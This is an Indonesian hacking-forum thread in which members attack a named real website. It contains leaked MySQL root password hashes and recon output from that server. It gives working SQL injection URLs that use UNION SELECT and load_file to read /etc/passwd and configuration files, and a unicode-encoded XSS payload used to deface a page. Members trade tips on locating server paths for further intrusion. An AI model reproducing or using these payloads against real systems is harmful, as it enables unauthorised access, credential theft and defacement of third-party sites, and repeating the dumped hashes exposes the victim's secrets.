Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
-
untouch
- Posts: 19
- Joined: Fri Feb 26, 2010 11:36 am
Post
by untouch » Sun Feb 28, 2010 12:53 am
cloroplast wrote:Target:
http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1
:ngakak: :ngakak: :ngakak:
ini ngopreknya bisa teratur gitu yk ???
pke tool apa sob ? :tapa:
-
anomie03
- Posts: 43
- Joined: Wed Feb 24, 2010 10:58 pm
Post
by anomie03 » Sun Feb 28, 2010 1:10 am
Dak Pakek Tool Cuman Pake Om Google Aja Om
-
3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
-
Contact:
Post
by 3xtr3m3b0y » Sun Feb 28, 2010 8:51 am
Another Vuln :
Code: Select all
http://www.fragrance.org/fifi_winners.php?year=%3Cscript%3Edocument.write(%27\u003C\u0068\u0031\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0062\u0072\u003E\u003C\u0063\u0065\u006E\u0074\u0065\u0072\u003E\u003C\u0062\u006C\u0069\u006E\u006B\u003E\u0033\u0078\u0074\u0072\u0033\u006D\u0033\u0062\u0030\u0079\u0020\u0077\u0034\u0035\u0020\u0068\u0033\u0072\u0033\u002E\u002E\u002E\u0021\u0021\u0021\u003C\u002F\u0062\u006C\u0069\u006E\u006B\u003E\u003C\u002F\u0063\u0065\u006E\u0074\u0065\u0072\u003E%27);%3C/script%3E
...n0 l1m17...
-
apriliana
- Posts: 38
- Joined: Mon Mar 26, 2007 2:02 am
- Location: jogja
-
Contact:
Post
by apriliana » Mon Mar 08, 2010 12:46 pm
Next Clue :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,2,3,4,load_file(0x2f7573722f6c6f63616c2f617061636865322f6874646f63732f436f6e6e656374696f6e732f636f6e6e46462e706870),6--
Setelah halaman terbuka, coba
View Source...
om ko bisa tau ada /usr/local/apache2/htdocs ini dari mana om?
di et/passwd paling deket adanya /usr/local/apache
tau index nya truh di folder apa gt caranya gmn om,kasih clue donk... :putusasa:
-
apriliana
- Posts: 38
- Joined: Mon Mar 26, 2007 2:02 am
- Location: jogja
-
Contact:
Post
by apriliana » Mon Mar 08, 2010 1:49 pm
buat postinganku sebelumnya ralat..bukan indexnya.
kira2 ada tips ga buat tau letak2 conf nya suatu web
-
3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
-
Contact:
Post
by 3xtr3m3b0y » Mon Mar 08, 2010 2:07 pm
apriliana wrote:Next Clue :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,2,3,4,load_file(0x2f7573722f6c6f63616c2f617061636865322f6874646f63732f436f6e6e656374696f6e732f636f6e6e46462e706870),6--
Setelah halaman terbuka, coba
View Source...
om ko bisa tau ada /usr/local/apache2/htdocs ini dari mana om?
di et/passwd paling deket adanya /usr/local/apache
tau index nya truh di folder apa gt caranya gmn om,kasih clue donk... :putusasa:
Untuk memudahkan penentuan PATH sebaiknya kita ketahui dulu jenis OSx :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--
Hasilx:
portbld-freebsd6.2
Dari info awal itu pencarian lokasi-lokasi penting pada sistem dapat dilakukan...
http://wiki.apache.org/httpd/DistrosDefaultLayout...n0 l1m17...
-
peniru
- Posts: 389
- Joined: Fri Jan 25, 2008 9:12 am
- Location: makassar
-
Contact:
Post
by peniru » Mon Mar 08, 2010 6:10 pm
3xtr3m3b0y wrote:cloroplast wrote:Target:
http://www.fragrance.org/news_detail.php?id=36
Host IP: 2**.255.7.13 (Proxy IP)
Web Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current User: root@localhost
Sql Version: 5.0.51a
Current DB: fragrance
System User: root@localhost
Host Name: fragrance.org
Installation dir: /usr/local/
DB User & Pass: root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:localhost
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:fragrance11.cpinyc.com
root:*41A981DA93CC5C966540B84AEFC977DCA643BC9C:127.0.0.1
:ngakak: :ngakak: :ngakak:
Wah mantep Om hasil petualanganx... :love:
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,user(),3,4,5,6+from+mysql.user--
<< mengizinkan kita menggunakan fasilitas tambahan di MySQL Server yaitu
LOAD_FILE (Membaca File yg ada pada Sistem) dan
INTO+OUTFILE (Membuat File pada Sistem). Hanya sayang berhubung direktif
magic_quotes_gpc = on, maka fasilitas INTO+OUTFILE tdk bisa kita gunakan, krn fasilitas tersebut hanya bisa menggunakan STRING.
Untuk mengecek jenis OS yg digunakan, bermanfaat untuk menentukan struktur Direktori lokasi-lokasi penting di Sistem :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,@@version_compile_os,3,4,5,6--
Contoh membuka isi file /etc/passwd di sistem :
Code: Select all
http://www.fragrance.org/news_detail.php?id=-36+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6--
selanjutnya bisa dikembangkan ke tahap berikutnya...
kk mo nampilin detain info web seperti diatas gimana kk? apa pake script py or pl?? ato ada cara yang lebih mudah??
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
